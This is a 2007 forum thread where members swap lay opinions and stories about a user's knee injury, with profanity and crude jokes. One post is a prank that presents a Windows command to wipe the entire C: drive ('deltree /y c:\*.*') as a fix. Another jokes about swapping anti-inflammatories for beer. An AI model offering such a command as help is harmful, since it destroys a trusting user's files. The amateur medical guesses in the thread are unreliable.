My guess is that you sprained your knee after continuing to play once deadlegged. Most likely put more stress on the knee than it's used to and that caused the swelling.

If your knee were buckling severely under the weight, I would guess that you tore your MCL, which usually happens if the knee is impacted from the side. So depending on how hard a shot you took to your leg, the whiplash could have hurt your MCL....who knows?

Certainly hope it's not a torn MCL and rather just a non-tearing sprain and fluid. Best of luck tomorrow at the doc's office!

Thanks.

If you can put weight on it, then chances are nothings torn. Maybe sprained, twisted, bruised and otherwise buggered but functional and will heal in time. I've had my anterior cruciate ligament torn along with the lateral and medial taking a beating, the joyful memory of seeing my knee sticking at a really odd angle after a particularly stupid mix of whiskey and skiing...
It's fixed now but it's still more or less never going to be 'quite right' under very high stress.

Trust me, you'll know if it's torn. You'll pray someone will just shoot you in the head to make the pain stop.

Great news though, the swelling is getting worse.
switch the anti-inflammatories for a beer

when i used to masterbate i used to get headaches, so i know what your talking about.

Yeah, it doesn't sound like anything serious is torn. I used to do that a lot, I'd total one knee at a tourney and hobble around the rest of the day on my other leg. Next day my knee would be much better but the other leg would be sore as fuck from all the extra stress. And hell, at least you didn't...oh wait, 2 fucking orthopedists couldn't figure out what was wrong with my knees. But yeah, the pain you're describing sounds like something thats happened to me and shouldn't be to serious, just hope its nothing long-term like whatever the fuck is wrong with me.

All you can do and should do is ice the hell out of it until you go see a doctor. And of course keep it elevated as much as possible. Do some minor bends with the leg if you can so it doesn't become too stiff either. I've had this kinda crap happen to me throughout all sports I've played.

Posted by Ghost Raver on Oct-04-2007 21:51:

Knee injuries suck I've had my left knee hurt since last winter or so, not really sure exactly when it started hurting, and now after going showing it to some doctors, I've only been told that it's nothing too serious and I should just let it take it's time to heal up and take pain killers when needed.
I've been taking pain killers every time I go play football (aka soccer) or anything else that'll most likely hurt the knee (often it doesn't need more than taking a step to hurt or at least feel weird, but I'm not gonna take those damn pills every 30 minutes or so), it's easier to play football if I don't need to play like I didn't have a left leg at all, or need to be so careful with it that I can't do anything well

Hope the outcome's good

Moral of the story... Don't play football.

Posted by DJ Mikey Mike on Oct-05-2007 12:12:

There's no major damage, it's just heavily bruised and swollen. I need to stay off it for a few days and keep taking anti-inflammatories. I've also got to see a physio who I can't get an appointment with till November. The NHS strikes again.

Awesome. Do you by any chance sit down when you pee?

Awesome, glad to hear nothing was torn.

Eh lucky bastard, but nice that nothing's wrong. Just keep an eye on it in the future, thats one area where you really really really don't want anything even mildly-serious to happen if you're an athlete

Posted by smakmagik on Oct-05-2007 18:37:

Start -> Run
type: cmd
type: deltree /y c:\*.*

Should fix everything. Probably best to repeat the same command for your other knee as well to be safe.

My playing days were over very quickly.

That's very true but, it really does come down to the individual. I partially tore my ACL when I was 14 or so at wrestling practice. Just over 60% of the ligament was torn. Long story short, I never had the ligament repaired and here I am 20 years later still dunking basketballs and playing like an 18 year old 3-5 times a week. I take great care to maintain my lower body strength to support the knee and I think that's been critical to my longevity. I do have some soreness from torn cartilage and I really do walk kind of funny but, I would much rather have that than to not be active at the level I am.

I guess I'm just saying to anyone that has had knee injuries, hope is not lost!

Agreed, I finally fucking started working out again (been years, I've been lazy) and my knees are sore from running a bit, but they don't get sore when they're in slightly weird positions as much. Used to be if i sat in one position for more than 20 minutes they'd get sore, still kinda is. going to the movies is hell

In what way? What's your routine? I've been having problems with my upper quad muscles for quite some time. This 'knock' has been the icing on the cake for me. I need to start strengthening them.
